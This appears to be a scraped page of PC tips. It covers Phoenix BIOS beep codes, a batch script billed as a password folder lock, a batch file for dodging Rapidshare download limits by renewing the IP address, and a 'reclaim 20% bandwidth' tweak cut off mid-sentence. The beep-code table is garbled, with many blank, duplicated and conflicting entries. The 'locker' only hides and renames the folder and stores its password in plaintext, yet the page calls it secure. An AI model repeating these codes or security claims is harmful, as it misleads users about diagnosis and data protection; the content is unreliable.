1 long beep, 3 short - A failure has been detected in memory above 64K.

1 long beep, 8 short - Display test failure.

Continuous beeping - A problem with the memory or video.

Phoenix Beep Codes

Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix version before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes. Click here for AMI BIOS beep codes.

4-Beep Codes

Beep Code Meaning

1-1-1-3 Faulty CPU/motherboard. Verify real mode.

1-1-2-1 Faulty CPU/motherboard.

1-1-2-3 Faulty motherboard or one of its components.

1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.

1-1-3-2 Faulty motherboard or one of its components.

1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.

1-1-3-2

1-1-3-3

1-1-3-4 Failure in the first 64K of memory.

1-1-4-1 Level 2 cache error.

1-1-4-3 I/O port error.

1-2-1-1 Power management error.

1-2-1-2

1-2-1-3 Faulty motherboard or one of its components.

1-2-2-1 Keyboard controller failure.

1-2-2-3 BIOS ROM error.

1-2-3-1 System timer error.

1-2-3-3 DMA error.

1-2-4-1 IRQ controller error.

1-3-1-1 DRAM refresh error.

1-3-1-3 A20 gate failure.

1-3-2-1 Faulty motherboard or one of its components.

1-3-3-1 Extended memory error.

1-3-3-3

1-3-4-1

1-3-4-3 Error in first 1MB of system memory.

1-4-1-3

1-4-2-4 CPU error.

1-4-3-1

2-1-4-1 BIOS ROM shadow error.

1-4-3-2

1-4-3-3 Level 2 cache error.

1-4-4-1

1-4-4-2

2-1-1-1 Faulty motherboard or one of its components.

2-1-1-3

2-1-2-1 IRQ failure.

2-1-2-3 BIOS ROM error.

2-1-2-4

2-1-3-2 I/O port failure.

2-1-3-1

2-1-3-3 Video system failure.

2-1-1-3

2-1-2-1 IRQ failure.

2-1-2-3 BIOS ROM error.

2-1-2-4 I/O port failure.

2-1-4-3

2-2-1-1 Video card failure.

2-2-1-3

2-2-2-1

2-2-2-3 Keyboard controller failure.

2-2-3-1 IRQ error.

2-2-4-1 Error in first 1MB of system memory.

2-3-1-1

2-3-3-3 Extended memory failure.

2-3-2-1 Faulty motherboard or one of its components.

2-3-2-3

2-3-3-1 Level 2 cache error.

2-3-4-1

2-3-4-3 Motherboard or video card failure.

2-3-4-1

2-3-4-3

2-4-1-1 Motherboard or video card failure.

2-4-1-3 Faulty motherboard or one of its components.

2-4-2-1 RTC error.

2-4-2-3 Keyboard controller error.

2-4-4-1 IRQ error.

3-1-1-1

3-1-1-3

3-1-2-1

3-1-2-3 I/O port error.

3-1-3-1

3-1-3-3 Faulty motherboard or one of its components.

3-1-4-1

3-2-1-1

3-2-1-2 Floppy drive or hard drive failure.

3-2-1-3 Faulty motherboard or one of its components.

3-2-2-1 Keyboard controller error.

3-2-2-3

3-2-3-1

3-2-4-1 Faulty motherboard or one of its components.

3-2-4-3 IRQ error.

3-3-1-1 RTC error.

3-3-1-3 Key lock error.

3-3-3-3 Faulty motherboard or one of its components.

3-3-3-3

3-3-4-1

3-3-4-3

3-4-1-1

3-4-1-3

3-4-2-1

3-4-2-3

3-4-3-1

3-4-4-1

3-4-4-4 Faulty motherboard or one of its components.

4-1-1-1 Floppy drive or hard drive failure.

4-2-1-1

4-2-1-3

4-2-2-1 IRQ failure.

4-2-2-3

4-2-3-1

4-2-3-3

4-2-4-1 Faulty motherboard or one of its components.

4-2-4-3 Keyboard controller error.

4-3-1-3

4-3-1-4

4-3-2-1

4-3-2-2

4-3-3-1

4-3-4-1

4-3-4-3 Faulty motherboard or one of its components.

4-3-3-2

4-3-3-4 IRQ failure.

4-3-3-3

4-3-4-2 Floppy drive or hard drive failure

3-Beep Codes

Beep Code Meaning

1-1-2 Faulty CPU/motherboard.

1-1-3 Faulty motherboard/CMOS read-write failure.

1-1-4 Faulty BIOS/BIOS ROM checksum error.

1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.

1-2-2

1-2-3 Faulty motherboard/DMA failure.

1-3-1 Memory refresh failure.

1-3-2

1-3-3

1-3-4 Failure in the first 64K of memory.

1-4-1 Address line failure.

1-4-2 Parity RAM failure.

1-4-3 Timer failure.

1-4-4 NMI port failure.

2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.

3-1-1 Master DMA failure.

3-1-2 Slave DMA failure.

3-1-3

3-1-4 Interrupt controller failure.

3-2-4 Keyboard controller failure.

3-3-1

3-3-2 CMOS error.

3-3-4 Video card failure.

3-4-1 Video card failure.

4-2-1 Timer failure.

4-2-2 CMOS shutdown failure.

4-2-3 Gate A20 failure.

4-2-4 Unexpected interrupt in protected mode.

4-3-1 RAM test failure.

4-3-3 Timer failure.

4-3-4 Time of day clock failure.

4-4-1 Serial port failure.

4-4-2 Parallel port failure.

4-4-3 Math coprocessor

Tip 10 :

Lock any folder without any software

NoTe- Its different from invisble as well hidden folder....here u need to have a password with which u can open your filder

here is the code

cls

@ECHO OFF

title Folder Locker

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Locker goto MDLOCKER

:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End

:UNLOCK

echo stuff by satish

echo Enter password to Unlock folder

set/p "pass=>"

if NOT %pass%==TYPE UR PASSWORD HERE goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDLOCKER

md Locker

echo Locker created successfully

goto End

:End

Instructions::

1) Copy the give code in a note pad and save the note pad in your pc with the name name.bat (that is with the extension of .bat). you can replace the name portion with anything u want.

NoTe-- In place of password in the code given type your desired password.

2) A batch file will be created where you hav saved. Now double click on it , it will make a folder with the name locker at the same place where the batch file is save.

3) Now add the files you want to be locked in that folder.

4) Double click on the batch file. It will ask for locking the folder formed. Type y(yes). The folder will be locked and hidden.

5) To unlock,double click on batch file again and enter the password in the new window opened.

Tested By Me Working 100%

Tip 11 :

A code to get unlimited downloads from Rapidshare!

Here it is:

1. Copy and paste this code :

@echo off

echo ipconfig /flushdns

ipconfig /flushdns

echo ipconfig /release

ipconfig /release

echo ipconfig /renew

ipconfig /renew

on your note pad or any other text editor

2. Save the file as : rapidshare.de.bat and leave it on your desktop

3. Every time you download from rapidshare double click on it!

Rip 12 :

Increase your Bandwidth by 20%

Increase your Bandwidth by 20%

Windows uses 20% of your bandwidth! Get it back

A nice little tweak for XP. M*crosoft reserve 20% of your available bandwidth for thei


Your Ad Here